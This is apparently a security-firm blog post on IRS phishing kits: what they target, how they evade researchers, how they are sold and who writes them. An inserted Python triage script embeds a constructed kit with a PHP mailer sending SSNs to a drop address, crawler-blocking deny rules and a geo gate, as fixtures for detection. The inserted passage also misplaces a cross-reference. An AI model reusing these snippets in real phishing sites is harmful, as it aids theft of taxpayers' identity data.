The PhishLabs Blog

Digging Deeper into IRS Phishing Attacks: How Do They Work and Who are the Scammers Behind Them?

Recently, the media has been exploding with articles noting a massive increase in tax fraud phishing scams. The IRS publicly announced that they had seen a 400 percent increase in phishing incidents so far this year targeting taxpayers. Phishing is even on the IRS’ “Dirty Dozen” list of scams for the 2016 tax season.

Indeed, our own internal data indicates a marked increase in phishing attacks using fake IRS websites to trick victims into providing extensive amounts of personal and financial information that can be used to file fraudulent tax returns. In fact, the number of IRS phishing sites observed in January of this year was greater than the total number of IRS phish seen in all of 2015.

Trend in IRS Phishing Sites from 2015 to present.

But how do these attacks work?  What information do they target?  And who is behind them?  These are the questions we want to look at in this post to provide a deeper understanding of IRS phishing attacks.

What Information is Being Targeted?

There are two types of targets for IRS phishers: taxpayers and tax professionals.  A majority of IRS phishing scams target taxpayer information.  These attacks vary in scope, but they generally seek to collect any personal, financial, and employment information needed to file a legitimate-looking fraudulent tax return.  Generally speaking, this information will include an individual’s identifying information (name, date of birth, social security number, address), filing status, employer information (company name, EIN, address), and income.  Some phishing sites take an extra step and gather victim spouse and dependent information, electronic filing PIN details, and/or complete W2 data.

Phishers use a variety of different ploys to trick victims into handing over their personal and financial information.  For IRS phishing schemes, the most common technique used to scam taxpayers was to claim that a victim needed to update or verify their information in order for their return to get processed.  Other methods used in these schemes include:

  • Tax return status inquiry
  • Electronic filing PIN request
  • Employment validation
  • Tax transcript request

Scams targeting tax professionals generally look to compromise a tax preparer’s login credentials for the IRS’ e-Services portal.  IRS e-Services is an online platform that allows tax professionals to request client transcripts and file client returns electronically.  Phishing attacks targeting e-Services credentials have been so prevalent this year that the IRS recently sent out a warning to tax preparers alerting them of the scam.

As you can imagine, although there are fewer attacks targeting tax preparers, the amount of damage that could be caused by these attacks has the potential to be far greater.  Not only would a phisher have the ability to request previous tax information for numerous clients at once, but they could also use the application to electronically file fraudulent returns using a vetted source.

Example of IRS e-Services phishing pages.

How Sophisticated Are These Attacks?

Aside from simply observing phishing pages to see what information is being targeted, one of the best ways to learn how a phishing attack works is by studying the phishing kit used to create the site, when available.  Since kits contain all of the files and scripts needed to render the phishing site(s), the amount of intelligence that can be collected from phish kits is invaluable.

Since the beginning of the year, we have collected more than 120 phish kits targeting IRS tax data.  A large majority of these kits were incredibly simplistic and only included one or two HTML files, a few mailer scripts, and a couple image files. 

The most common method of sending compromised information to a phisher is by using a temporary drop email account.  All of the kits that were analyzed used email to capture victim data; however, a good number of them also created a text file that was posted to the compromised server for later retrieval.  Although we have previously seen phishers using this method to save victim information, it seems to be used more frequently in these types of scams. 

Example of logging compromised information to a locally-stored text (.txt) file.

Very few of the kits had any type of access controls to prevent restricted visitors in the form of HTACCESS files or PHP blacklists.  Usually, these access controls are used to prevent security researchers or web crawlers from visiting and analyzing the site by denying access to particular IP address blocks.  An interesting feature found in one of the kits was an access control whitelist that only allowed visitors to access the phishing page from IP addresses in the United States.  This whitelist technique is actually quite rare in phish kits; however, it makes sense that it would be used in this type of scam, as it would restrict visitors to only those who would likely have legitimate dealings with the IRS.

IP whitelist found in phishing kit.

Another technique that was seen in some of the kits that increased the perceived authenticity of the phishing site was the use of a security pop-up that alerts a visitor that they are using an authorized government system.  The use of this pop-up makes the site seem more genuine and, thus, conditions a potential victim to trust the reason for needing to provide the requested information.

Fake government security alert on IRS phishing page.

How are IRS Phish Kits Distributed?

As we discussed in our 2016 Phishing Trends and Intelligence Report, although there are many individuals who commit phishing attacks, there is only a small population of phishers who are sophisticated enough to write a kit from scratch.  These kit authors sell their kits in places such as Dark Web marketplaces or underground forums, or freely distribute them using social media or file sharing sites (although, these free kits usually include a hidden backdoor that sends compromised information back to the kit author unbeknownst to the kit’s user). 

More than half of the IRS kits collected were found to have originated from free, publicly accessible file sharing sites.  Any would-be scammer could simply locate the page where these kits are being hosted, download them, and use them to create fake IRS webpages.  Because some file sharing sites keep track of the number of times a file has been downloaded, we are able to track the potential spread of kits into the phishing ecosystem.  On a single file sharing site, we identified seven different IRS phish kits that had been downloaded by 98 individuals. 

Example of IRS phish kit freely available on file sharing website.

IRS kits being sold on underground markets or vendor webpages were priced between $20 and $100.  We found some of these paid kits in the wild on live phishing sites; however, not nearly in the same quantity as the free kits.  Many of the paid kits included some additional premium features not seen in free kits, such as IP blocking, field validation, code obfuscation, and message encryption.

IRS phish kit for sale on vendor webpage.

Who’s Behind These Scams?

Although the identification of an individual committing a phishing attack is often difficult, we are generally able to uncover a great deal of information about phish kit authors, which can provide significant insight into the ultimate origin of the scam.  Whether it’s for marketing purposes or simply to boast about their creations, kit authors usually leave clues to their identity within the HTML pages, scripts, filenames, and directory structure of the kit.  These clues can then be used to identify forums, social media profiles, blogs, and other websites associated with the author.  Very few phish kit authors practice good operational security, which makes attribution possible much of the time. 
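The following Python script is an added example, not PhishLabs tooling and not taken from any kit described in this post. It shows how an analyst might statically triage an unpacked kit for the indicators discussed above: the drop e-mail address in the mailer script and victim data appended to a local text file (the exfiltration methods described earlier), .htaccess IP blacklists and PHP geo whitelists (the access controls described earlier), and author signatures left in comments (the attribution clues described here). The sample kit is constructed inline; every path, address, IP prefix and name in it is a placeholder.

```python
"""Static triage of an unpacked phishing kit (added example, not PhishLabs tooling)."""
import hashlib
import re

# Constructed sample kit: relative path -> file contents. Nothing here is
# from a real kit; addresses, prefixes and the author name are placeholders.
SAMPLE_KIT = {
    "index.html": "<!-- Created by ExampleAuthor --><html><body>...</body></html>",
    "process.php": """<?php
// constructed mailer script: e-mails the submitted form to a drop account
$recipient = "drop.example@example.com";
$message = "SSN: " . $_POST['ssn'] . "\\n";
mail($recipient, "IRS Result", $message);
// and also appends it to a text file left on the compromised server
$fp = fopen("result.txt", "a");
fwrite($fp, $message);
fclose($fp);
header("Location: https://www.irs.gov/");
?>""",
    ".htaccess": """order allow,deny
deny from 66.249.
deny from 64.233.
allow from all""",
    "blocker.php": """<?php
// constructed whitelist: only visitors geolocated to the US get the page
$country = geoip_country_code_by_name($_SERVER['REMOTE_ADDR']);
if ($country != "US") { header("HTTP/1.0 404 Not Found"); exit(); }
?>""",
}

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
MAIL_CALL_RE = re.compile(r"\bmail\s*\(")
# fopen()/file_put_contents() with a literal filename: a local victim-data log
LOCAL_LOG_RE = re.compile(r"\b(?:fopen|file_put_contents)\s*\(\s*['\"]([^'\"]+)['\"]")
DENY_RE = re.compile(r"^\s*deny\s+from\s+(\S+)", re.I | re.M)
GEO_GATE_RE = re.compile(r"\b(?:geoip\w*|REMOTE_ADDR)\b")
COUNTRY_RE = re.compile(r"['\"]([A-Z]{2})['\"]")
AUTHOR_RE = re.compile(r"\b(?:created|coded|made|designed)\s+by\s+([^\n<>-]+)", re.I)


def triage_kit(files):
    """Return a dict of indicators found across the kit's files."""
    report = {
        "mailer_scripts": [],   # files that call mail()
        "drop_emails": set(),   # every address seen in a mailer script
        "local_logs": [],       # (file, log filename) pairs
        "ip_blacklist": [],     # prefixes denied in .htaccess
        "access_gates": [],     # (file, country codes) for geo/IP gating
        "author_clues": [],     # (file, signature) from comments
    }
    for path, text in files.items():
        if MAIL_CALL_RE.search(text):
            report["mailer_scripts"].append(path)
            report["drop_emails"].update(EMAIL_RE.findall(text))
        for m in LOCAL_LOG_RE.finditer(text):
            report["local_logs"].append((path, m.group(1)))
        if path.endswith(".htaccess"):
            report["ip_blacklist"].extend(DENY_RE.findall(text))
        if GEO_GATE_RE.search(text):
            report["access_gates"].append((path, sorted(set(COUNTRY_RE.findall(text)))))
        for m in AUTHOR_RE.finditer(text):
            report["author_clues"].append((path, m.group(1).strip()))
    return report


def kit_fingerprint(files):
    """SHA-256 of the sorted file listing, for clustering re-uploads of one kit."""
    listing = "\n".join(sorted(files)).encode()
    return hashlib.sha256(listing).hexdigest()


if __name__ == "__main__":
    for key, value in triage_kit(SAMPLE_KIT).items():
        print(f"{key}: {value}")
    print("fingerprint:", kit_fingerprint(SAMPLE_KIT))
```

Two design points worth noting. `drop_emails` is a set rather than a single address because a kit with more than one recipient is exactly the hidden-backdoor pattern described later in the post, where a free kit quietly copies victim data to its author; any second address in a mailer script deserves a look. The `kit_fingerprint` hash of the file listing is deliberately coarse so that the same kit re-uploaded to different file sharing sites, or edited only in its drop address, still clusters together when tracking how widely one author's kits spread.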

For the IRS kits we analyzed, additional attribution information was found for a majority of the kit authors and/or users.  Not surprisingly, many of the IRS phishers that we identified hailed from Nigeria.  One of the most prolific authors, whose kits comprised nearly half of all IRS kits collected since the beginning of the year, is a Pakistani man who, in addition to selling IRS phish kits, sells kits for dozens of other companies in various industries.  His kits were also found being freely distributed on file sharing sites.  We also identified individuals from Indonesia and Syria who were associated with the creation or usage of kits used in IRS phishing attacks.

Wrapping Things Up

Although we have seen a tremendous spike in phishing activity targeting the IRS this tax season, it seems that the kits that fuel these attacks are written and distributed by a relatively small number of people.  Many of the scams are rather unsophisticated, although some phishers have included some more advanced features to enhance the authenticity of their phishing sites and restrict access to the sites to certain visitors.  Because a vast majority of IRS phish kits are distributed openly in hacking forums or on file hosting sites, it gives us an opportunity to better understand the ecosystem that creates these schemes.  By using proactive techniques to identify and disrupt the kit distribution supply chain and infrastructure, there is a potential to mitigate some of these attacks before they occur heading into the next tax season.

Topics: Phishing, Fraud, Phish Kit, Spear Phishing, IRS Phishing Attacks
